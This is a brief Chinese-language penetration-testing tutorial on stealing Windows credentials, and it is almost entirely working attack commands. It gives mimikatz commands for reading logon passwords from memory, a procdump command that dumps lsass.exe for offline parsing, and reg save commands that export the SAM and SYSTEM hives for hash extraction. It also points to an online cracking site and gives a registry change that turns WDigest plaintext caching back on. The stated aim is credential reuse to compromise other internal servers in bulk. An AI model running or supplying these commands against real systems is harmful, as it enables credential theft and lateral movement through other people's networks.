概述
渗透测试过程中对于windows 系统中的密码获取是十分重要的一步,获取密码后我们可以对内网中其他机器进行撞库,快速、批量拿下其他服务器权限。
windows密码获取方法
最主流的获取windows 密码的方法最主流的方法有三种,mimikatz 直接执行获取;procdump + mimikatz 进行获取;读取注册表进行获取 + mimikatz 解密进行获取。
使用这三种方式的前提是必须在管理员的权限下进行执行命令,不然执行会失败。
mimikatz直接获取
直接将mimikatz 上传到目标服务器,执行相关命令。
命令
privilege::debug //提升至debug权限
sekurlsa::logonpasswords //抓取密码
procdump + mimikatz
命令
procdump64.exe -accepteula -ma lsass.exe lsass.dmp
下载到本地,mimikatz执行
sekurlsa::minidump
sekurlsa::logonpasswords full
注册表获取密码
reg save hklm\sam sam.hiv
reg save hklm\system sys.hiv
mimikatz 解密
lsadump::sam /system:sys.hiv /sam:sam.hiv
然后使用在线网站进行破解
https://www.objectif-securite.ch/
这里其实就是将sam 文件通过导出文件,然后解析。
mimikatz 直接获取sam 文件内的hash。
log res.txt
privilege::debug
token::elevate
lsadump::sam
注意事项
当系统为win10或2012R2以上时,默认在内存缓存中禁止保存明文密码,此时可以通过修改注册表的方式抓取明文,但需要用户重新登录后才能成功抓取。
reg add hklm\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
参考
https://www.objectif-securite.ch/ophcrack
https://blog.csdn.net/Adminxe/article/details/105926959
https://blog.csdn.net/w1590191166/article/details/107350200
https://cloud.tencent.com/developer/article/1684021
https://zhuanlan.zhihu.com/p/58875844
https://times0ng.github.io/2018/04/20/Windows%E5%AF%86%E7%A0%81%E6%8A%93%E5%8F%96%E6%80%BB%E7%BB%93/
https://www.secrss.com/articles/24903
https://www.jianshu.com/p/801ef84321ab
https://gitbook.cn/gitchat/column/5afbf24f753289354cab7983/topic/5afbf818753289354cab7e3c